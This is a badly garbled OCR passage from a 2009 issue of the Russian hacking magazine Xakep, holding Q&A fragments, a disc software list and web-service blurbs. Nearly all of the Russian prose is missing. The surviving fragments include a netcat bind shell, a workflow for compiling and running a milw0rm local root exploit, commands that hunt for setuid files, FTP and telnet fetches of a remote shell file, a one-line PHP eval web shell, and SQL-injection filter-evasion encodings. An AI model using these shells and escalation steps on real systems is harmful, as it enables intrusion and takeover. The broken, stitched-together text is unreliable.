X 10 /130/ 09

(http://www.web-hack.ru/download/download.
php?go=100);
3. netcat
11457: cmd.exe c:/nc/nc.exe -l -p 11457;
4. r57 connect-back
( IP ip ,
);
5. netcat
.
,
,
:
1. : uname -a;
2. : cat /
etc/*release*;
3. http://milw0rm.com/search.php
local root exploit;
4. : gcc -o exploit
exploit.c (


);
5. : ./
exploit;
6. uid=0, gid=0,
.
, :
1. ,

ps -aux
which bin_file ,

bin_file --version ( -v)

ls -la /bin /home /usr/bin /usr/


sbin /usr/local/bin /usr/local/
sbin ,

2. milw0rm.com
;
3. , /.
, .
, ( setuid)
,
.
1. :
find / -type f -perm -04000 -ls
find / -type f -perm -02000 -ls
locate *.pl|grep suidperl

2. ,
, :

-rwsrwxrwx 1 root petya


18.40 file1.php
-rwsrwxrwx 1 root petya
18.40 file1.sh
-rwsrwxrwx 1 root petya
18.40 file
-rwxr-sr-x 1 petya root
18.40 file2.php
-rwxr-sr-x 1 petya root
18.40 file2.sh
-rwxr-sr-x 1 petya root
18.40 file2

135 17
135 17
135 17
135 17
135 17
135 17

3
suid ,
bash/php
root.
3 root.
,
, , ( ,
: strace ./file2,
strings ./file2).
, ,
, ,
-
(, .bash_history
su sudo,

).

:
locate -
find / -type f -name "-"

:
.htaccess
.htpasswd
*history*
*conf*
*backup*

, ,
cron:
1. crontab;
2. ,
;
3. ,
, , :
4.
.
root-

141

UNITS

,
:)
Q: ?

SQL-
psql:
psql -d base -U pg_admin -W pg_
admin_password

com/p/haraldscan).
Pybluez,
MAC-
, ,
.

wget curl :'(.


A:

, .
:
1. echo

postgresql :

, Flash. -

pg_dump dbname > dbname.sql

2. ftp
>ftp
ftp> open localhost
Connected to localhost
Microsoft FTP
User (x.x.x.x:(none)): x
230 User logged in, proceed.
ftp>get http://site.com/shell.txt

cat dbname.sql | psql dbname


.
Q: Python'.
, , ,
Python
PHP-. ,
- Python?
?

3. telnet
telnet site.com 80 -f shell.php
GET /shell.txt HTTP/1.1
Accept: */*
Accept-Language: ru
Host: site.com
Proxy-Connection: Keep-Alive
Q: sql-, .
sql-?
A: !
:
1. + %2B;
2. "
" %09;
3. " " %0D;
4. %0A;
5. /**/
6. : select(1)from(users)where(id=1)
Q: , MySQL
;. , ?
A: ,
:
1. MySQL >= 4.1;
2. mysql_real_connect() CLIENT_MULTI_STATEMENTS.
,
CLIENT_MULTI_RESULTS,

mysql_next_result().
Q:
PostgreSQL?
A: ! -

142

.
.

:
echo ^<? eval($_REQUEST[cmd]); ?^>
> shell.php

Q:

A: ,
, WSGI
(Web Server Gateway Interface).

Python, , -, , Apache. WSGI
,
-
-.
:

. ,
WSGI, , ..
,
mod_python Apache FastCGI,
CGI.
.
middleware-, ,
. middleware
, .
WSGI- middleware,

( , ,
..)
Q: , Bluetooth- .
.
A: , . Python
(www.xakep.
ru/magazine/xa/104/030/1.asp). ,
,
, Haraldscan (code.google.

A: , ,
:).
, ,
,
-,
Flash. HP
Web Security Research Group
HP SWFScan (https://h30406.www3.
hp.com/campaigns/2009/wwcampaign/15TUVE/index.php?key=swf),
SWF-,
ActionScript,

. , , ,
SWFScan
.
Q:
. ,
:
?
A:
. -
HDD, .
,
-,
, , . , ,
, , , ,
.

.
-
HAProxy (haproxy.1wt.eu)
Cacti
(www.cacti.net).
Q: ,
SSL?
A: SSHole (thekonst.
net/ru/sshole). ,
, SSL.

, ,
,
. ,
stdout. SSHole

. z
X 10 /130/ 09

>Misc
Chandler Desktop 1.0.3
Console 2.00b
Copy Path Shell Extension 1.1
Evernote 3.5.0
Everything 1.2.1.371
Lacuna Launcher 1.0
ManicTime 1.2.1

>Games
Scorched3D 42.1
ZumasRevenge Demo

>Development
Aptana Studio 1.5.1
AQtime 6.21
CodeIgniter 1.7.2
EmEditor 8.06
Firebird 2.1.3
Geany 0.18
Google App Engine SDK 1.2.5
Intype 0.3.1
JDK 6 Update 16 with NetBeans
6.7.1
Jython 2.5.1
MonoDevelop 2.2b1
Pida 0.4.4
Portable Python 1.1
pydee 0.4.23
Pydev 1.5.0
PyScripter 1.9.9.7
Python 2.6.2
Python 3.1.1
Qt SDK for Open Source C++
2009.03.1
SharpDevelop 3.1
SQLite 3.6.18
SQLiteManager 3.1.1
TortoiseSVN 1.6.5
UltraGram 4.2.50
Web IDE 4.45
WebLOAD 8.4RC
Wing IDE 3.2.1-1

>>WINDOWS
>Dailysoft
7-Zip 4.65
AIMP 2.51
Autoruns for Windows 9.53
DAEMON Tools Lite 4.30.4
Download Master 5.5.12.1173
Far Manager 2.0
FileZilla Client 3.2.7.1
K-Lite Codec Pack Full 5.1.0
Miranda IM 0.8.7
Mozilla Firefox 3.5.3
Notepad++ 5.5.5
Opera 10.00
PuTTY 0.60
QIP 2005 Build 8095
Skype 4.04.0
Total Commander 7.04a
Unlocker 1.8.7
Xakep CD DataSaver 5.2
XnView 1.96.2

>>UNIX
>Desktop
Ayam 1.16
Blender 2.49b
Cinelerra 4.1
GNOME 2.28.0
Inkscape 0.47pre3
KDocker 4.2.2
Launchy 2.1.2
Necromancer's Dos Navigator 2.31
Nero Linux 4
OGMRip 0.13.1
RockBox 3.4
Sound Juicer 2.28
Task Coach 0.74.2
Tellico 2.0
Theora 1.1

>System
BareTail 3.50a
dot.NET Framework 3.5 Service
Pack 1
EASEUS Partition Master 4.0.1
GFI Backup 2009 for FREE
Microsoft Web Platform Installer 2.0
Norton Antivirus 2010
Norton Internet Security 2010

>Security
Cookienator 2.5.32
Google Chrome 3.0
JStock 1.0.4j
SpeedyFox 1.3
Spiffy 0.3.4
Thunderbird 2.0.0.23

>Security
Authforce 0.9.9
BFBTester 2.0.1
Flawfinder 1.27
Haraldscan 0.3
Hping3
John the Ripper 1.7.3.4
Kismet 2009.06 R1
NetStumbler 0.4.0
Nikto 2.03
OSSEC HIDS 2.2

>Net
aMule 2.2.6
Appkonference 1.2
Choqok 1.0
DRadio 3.4
Ekiga 3.20
Gnash 0.8.6
Googsystray 0.6
gPodder 2.0
jIRCii 09.22.09
Konversation 1.2
KTorrent 3.2.4
LFTP 4.0.2
Mozilla Firefox 3.0.14
Opera 10
SIM 0.9.4.3
TorNavigator 0.0.2
TubeMaster++ 1.4
TunnelIt 0.0.1.1514
vnStat 1.9
Wget 1.12

>Games
CuteMaze 1.1.0
The Legend of Edgar 0.31

>Devel
Anjuta IDE 2.28
Arcadia 0.7.0
BIEW 6.0
BitRock InstallBuilder 6.2.2
boost 1.40.0
Glom 1.12.0
graudit 1.2
KDbg 2.2.0
KDiff3 0.9.95
Kohana 3.0
libglade 2.0.1
liboggz 1.0.0
libusb 1.0.3
nwcc 0.8
PyDev 1.5.0
sdcc 2.9.0
Source Navigator 6.0
Tora 2.1.0
Umbrello 1.5.8
Vaadin 6.1.1

>Multimedia
Appetizer 1.3
Artizen HDR Stand-alone 2.8b
cuberok 0.0.11
Desktoptube 1.2
Google SketchUp 7.1
iTunes 9.0.1
Jaangle 0.97
Logon Controller
MetatOGGer 3.9.3.0
MurGeeMon
Picasa 3.5
Pitch Perfect Guitar Tuner
PlusOffice Free 2009 3.0
Viewer2

>Net
Cookienator 2.5.32
Google Chrome 3.0
JStock 1.0.4j
SpeedyFox 1.3
Spiffy 0.3.4
Thunderbird 2.0.0.23

Tracker 0.7.0
Transmageddon 0.13
wbar 1.3.3
XNeur+gXNeur 0.9.6
Xplanet 1.2.1

PowerGREP 3.5.5 Demo


ReNamer 5.50
Seven Remix XP 2.3.1
Taskbaric 20090530
Traduisons! 0.3.0

>X-distr
Desktop BSD 1.7
DragonFly BSD 2.4

>System
ATI Catalyst 9.9
Cluster SSH 3.27
Conky 1.7.2
Firewall Builder 3.0.7
G4L 0.31
Gslapt 0.5.2
iptables 1.4.5
KBackup 0.6.3
Linux Kernel 2.6.31.1
nVidia 185.18.36
SADMS 2 2.0.13
slapt-get 0.10.2a
Sysstat 9.0.5
SystemTap 1.0
Ubuntu Tweak 0.4.9
Wine 1.1.30

>Server
Apache 2.2.13
Asterisk 1.6.1.6
BIND 9.5.2
CUPS 1.4.1
DeleGate 9.9.4
DHCP 4.1.1b2
GAdmin-DHCPD 0.4.6
MySQL 5.1.39
OpenLDAP 2.4.18
OpenSSH 5.2
OpenVPN 2.0.9
PostgreSQL 8.4.1
Rspamd 0.2.7
Samba 3.4.1
Sendmail 8.14.3
SpamCheck 0.6.5
Squid 3.0.STABLE19
Sshguard 1.4

Snort 2.8.5
SSLsniff 0.6
sXid 4.2
Trafscrambler 0.2
Websecurify 0.3
Wireshark 1.2.2
Yersinia 0.7.1
Sql-Injection:
Absinthe 1.4.1
Blind SQL Injection Perl Tool
FG Injector 0.9a
MySqloit 0.1
SQID 0.3
SQL Power Injector 1.2
Sqlbftools 1.2
SQLBrute
SQLIer 0.8.2b
Sqlmap 0.7
SQLNinja 0.2.3

10(130) 2009

x 10 () 2009
TOR/
130

. 26

10 (130) 2009



: 2
10
.

. 90

WEB-
. 102

8&#
;01&


SQL-INJECTION
POSTGRESQL
. 76

. 84

CHAOS CONSTRUCTIONS 09:

UNITS

HTTP:// WWW2

FINEREADER ONLINE
finereaderonline.com

, , ,
Finereader,
. , -, - . OCR-,
. FineReader Online
Microsoft Word, Excel . ,
- , , 10 .



RSS-

DAPP FACTORY

www.dapper.net/dappfactory.jsp
,
. Dapp Factory ... RSS-, -
.
( ),
, (, ),
( ),
.
Dapp Factory .
RSS-,
. RSS- -.

144

SECUNIA ONLINE
SOFTWARE
INSPECTOR

secunia.com/
vulnerability_scanning/
online
PSI , .
, .
. ,
-, .
Java.

NETBOOT.ME
netboot.me

- .
CD/DVD
USB-. wired, ( ) Linux
BSD. netboot.me
, . , ,
, . !
X 10 /130/ 09